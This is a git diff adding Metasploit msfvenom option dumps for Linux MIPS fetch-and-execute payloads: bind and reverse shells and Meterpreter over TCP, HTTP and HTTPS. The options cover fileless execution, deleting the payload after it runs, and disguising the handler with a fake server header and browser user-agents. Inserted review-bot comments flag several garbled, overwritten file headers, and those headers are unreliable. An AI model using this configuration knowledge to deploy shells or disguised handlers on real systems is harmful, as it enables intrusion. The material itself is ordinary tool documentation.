Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-mipsbe-shell_bind_tcp.txt b/msfvenom/payload_options/cmd-linux-tftp-mipsbe-shell_bind_tcp.txt new file mode 100644 index 0000000..f4e4e34 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-mipsbe-shell_bind_tcp.txt 
@@ -0,0 +1,74 @@ + + Name: TFTP Fetch, Linux Command Shell, Bind TCP Inline + Module: payload/cmd/linux/tftp/mipsbe/shell_bind_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 105 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + scut + vaicebine + Vlatko Kosturjak + juan vazquez + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME iIlayMFxi no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an MIPSBE payload from a TFTP server. + Listen for a connection and spawn a command shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. 
+ AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-mipsbe-shell_reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-tftp-mipsbe-shell_reverse_tcp.txt new file mode 100644 index 0000000..3610ba2 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-mipsbe-shell_reverse_tcp.txt 
@@ -0,0 +1,79 @@ + + Name: TFTP Fetch, Linux Command Shell, Reverse TCP Inline + Module: payload/cmd/linux/tftp/mipsbe/shell_reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 105 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + rigan + juan vazquez + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME EdHkCdfGd no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an MIPSBE payload from a TFTP server. + Connect back to attacker and spawn a command shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. 
+ AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. 
Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-mipsle-exec.txt b/msfvenom/payload_options/cmd-linux-tftp-mipsle-exec.txt new file mode 100644 index 0000000..2dd18b3 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-mipsle-exec.txt 
@@ -0,0 +1,70 @@ + + Name: TFTP Fetch, Linux Execute Command + Module: payload/cmd/linux/tftp/mipsle/exec + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 108 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Michael Messner + entropy + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +CMD yes The command string to execute +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME pkFFSgBQoQ no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an MIPSLE payload from a TFTP server. + + A very small shellcode for executing commands. + This module is sometimes helpful for testing purposes as well as + on targets with extremely limited buffer space. 
+ + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-mipsle-meterpreter-reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-tftp-mipsle-meterpreter-reverse_tcp.txt new file mode 100644 index 0000000..b64695b --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-mipsle-meterpreter-reverse_tcp.txt 
@@ -0,0 +1,100 @@ + + Name: TFTP Fetch, Reverse TCP Stager + Module: payload/cmd/linux/tftp/mipsle/meterpreter/reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 105 + Rank: Norm +Evasion options for payload/cmd/linux/tftp/mipsle/meterpreter/reverse_tcp: +========================= + + juan vazquez + tkmru + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME PHKBDTDUB no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an MIPSLE payload from a TFTP server. 
+ Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. 
+ EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. 
Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-mipsle-meterpreter_reverse_http.txt b/msfvenom/payload_options/cmd-linux-tftp-mipsle-meterpreter_reverse_http.txt new file mode 100644 index 0000000..87f09d7 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-mipsle-meterpreter_reverse_http.txt 
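Review bot: the header of cmd-linux-tftp-mipsle-meterpreter-reverse_tcp.txt is corrupted and the file needs regenerating: "Rank: Norm" is cut off, and the "Evasion options for payload/cmd/linux/tftp/mipsle/meterpreter/reverse_tcp:" banner with its "=====" underline sits where the "Provided by:" line and the first author names belong (the intact cmd-linux-tftp-mipsle-meterpreter_reverse_tcp.txt in this same patch shows the expected shape, with Brendan Watters and Spencer McIntyre listed before the module-specific authors, and no banner is followed by an evasion-options table here). The banner text has overwritten the original bytes in place rather than being inserted, which looks like stdout and stderr being written to the same file through separate descriptors; capture them through one descriptor (2>&1) or discard stderr when generating.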
@@ -0,0 +1,104 @@ + + Name: TFTP Fetch + Module: payload/cmd/linux/tftp/mipsle/meterpreter_reverse_http + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 114 + Rank: Normal + +Provided by: + +Evasion options for payload/cmd/linux/tftp/mipsle/meterpreter_reverse_http: +========================= + +ok@rapid7.com> + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The local listener hostname +LPORT 8080 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME FugHyIMduJtv no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an MIPSLE payload from a TFTP server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. 
+ AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (iPad; CPU OS 17_7_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Mobile/15E148 Safari/604.1 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + 
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-mipsle-meterpreter_reverse_https.txt b/msfvenom/payload_options/cmd-linux-tftp-mipsle-meterpreter_reverse_https.txt new file mode 100644 index 0000000..3654a36 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-mipsle-meterpreter_reverse_https.txt 
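Review bot: cmd-linux-tftp-mipsle-meterpreter_reverse_http.txt has the same overwritten header: "Provided by:" is followed by a blank line, the "Evasion options for payload/cmd/linux/tftp/mipsle/meterpreter_reverse_http:" banner and a truncated author entry "ok@rapid7.com>", so the first author names were clobbered; regenerate this file with stdout and stderr captured in order. Also note that the HttpUserAgent default here (Mozilla/5.0 (iPad; CPU OS 17_7_2 ...)) is not the same string as in the HTTPS dump, so this line will churn on every regeneration unless the generator normalises it.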
@@ -0,0 +1,106 @@ + + Name: TFTP Fetch + Module: payload/cmd/linux/tftp/mipsle/meterpreter_reverse_https + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 111 + Rank: Normal + +Provided by: + B +Evasion options for payload/cmd/linux/tftp/mipsle/meterpreter_reverse_https: +========================= + +@rapid7.com> + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The local listener hostname +LPORT 8443 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME DMzxhxFBSxJ no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an MIPSLE payload from a TFTP server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. 
+ AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to 
use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerVerifySSLCert false no Whether to verify the SSL certificate in Meterpreter + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-mipsle-meterpreter_reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-tftp-mipsle-meterpreter_reverse_tcp.txt new file mode 100644 index 0000000..8c8df63 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-mipsle-meterpreter_reverse_tcp.txt 
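Review bot: cmd-linux-tftp-mipsle-meterpreter_reverse_https.txt shows the same overwrite as the http and meterpreter/reverse_tcp dumps: "Provided by:" is followed by a lone "B", the "Evasion options for payload/cmd/linux/tftp/mipsle/meterpreter_reverse_https:" banner and a truncated "@rapid7.com>"; regenerate all three files together and check the "Provided by:" block against the intact meterpreter_reverse_tcp dump before merging. The transport-specific options (LPORT 8443, SSLVersion, StagerVerifySSLCert) are otherwise consistent with the HTTPS transport and need no change.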
@@ -0,0 +1,97 @@ + + Name: TFTP Fetch + Module: payload/cmd/linux/tftp/mipsle/meterpreter_reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 105 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Adam Cammack + Brent Cook + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME RyQJyqVGA no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an MIPSLE payload from a TFTP server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. 
